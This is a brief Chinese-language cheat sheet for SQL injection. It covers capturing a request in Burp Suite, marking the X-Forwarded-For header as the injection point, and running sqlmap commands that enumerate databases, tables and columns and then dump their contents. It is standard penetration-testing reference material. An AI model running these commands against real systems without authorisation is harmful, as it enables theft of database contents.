burpsuite抓包
在sqlmap根目录建一个文档,将数据包复制到文档中,将注入点值改为*
例X-Forwarded-For注入:
X-Forwarded-For: *
爆破数据库
python2 sqlmap.py -r a.txt --dbs --batch
爆破表名
python2 sqlmap.py -r a.txt -D "数据库名" --table --batch
爆表中的字段
python2 sqlmap.py -r a.txt -D "数据库名" -T "表名" --columns --batch
爆字段中的值
python2 sqlmap.py -r a.txt -D "数据库名" -T "表名" -C "字段名" --dump --batch